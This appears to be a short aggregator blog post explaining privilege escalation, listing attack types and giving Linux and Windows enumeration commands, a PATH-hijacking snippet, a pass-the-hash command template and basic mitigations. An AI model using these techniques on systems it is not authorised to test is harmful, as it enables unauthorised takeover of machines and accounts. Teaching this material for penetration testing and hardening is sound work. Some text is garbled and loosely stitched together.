Listen to this Post
Privilege escalation is a cybersecurity attack in which an adversary exploits flaws or misconfigurations in a system to obtain higher access rights or permissions than originally granted, allowing actions that bypass intended security controls.
Here are different types of privilege escalation attacks:
- Vertical Privilege Escalation (Privilege Elevation): Gaining higher-level permissions (e.g., user to admin).
- Horizontal Privilege Escalation: Accessing another userβs privileges at the same level (e.g., user A accessing user Bβs data).
- Kernel Exploits: Leveraging vulnerabilities in the OS kernel.
- Misconfigured File Permissions: Exploiting improperly set file/folder permissions.
- SUID/SGID Exploits: Abusing executables with elevated permissions.
- Scheduled Tasks/Cron Jobs: Manipulating automated tasks to execute malicious code.
- DLL Hijacking: Replacing legitimate DLLs with malicious ones.
- Password Attacks: Cracking or stealing credentials for higher privileges.
You Should Know:
Linux Privilege Escalation Commands & Techniques
1. Check User Privileges:
whoami id sudo -l
2. Find SUID/SGID Files:
find / -perm -4000 -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null
3. Kernel Exploit Check:
uname -a searchsploit "Linux Kernel <version>"
4. Cron Job Inspection:
crontab -l ls -la /etc/cron*
5. Exploiting PATH Hijacking:
echo "/bin/bash" > /tmp/ls chmod +x /tmp/ls export PATH=/tmp:$PATH
Windows Privilege Escalation Techniques
1. Check User Permissions:
whoami /priv net user <username>
2. Find Unquoted Service Paths:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"
3. DLL Hijacking:
- Use Procmon to identify missing DLLs.
- Replace with malicious DLL.
4. Registry Checks for Weak Permissions:
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
5. Pass-the-Hash Attack:
pth-winexe -U <hash> //<target> cmd
Prevention & Mitigation
- Regular Patch Management:
sudo apt update && sudo apt upgrade -y # Linux
- Least Privilege Principle: Restrict user permissions.
- Audit File Permissions:
auditd - Linux auditing tool icacls (Windows)
- Disable Unnecessary Services:
systemctl disable <service>
What Undercode Say:
Privilege escalation remains a critical attack vector in cybersecurity. Understanding both offensive and defensive techniques is essential for penetration testers and system administrators. Regular audits, strict permission controls, and staying updated with exploits are key to mitigating risks.
Expected Output:
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo)
**Reference:**
- High-res PDF on privilege escalation: https://study-notes.org
References:
Reported By: Xmodulo Privilege – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass β
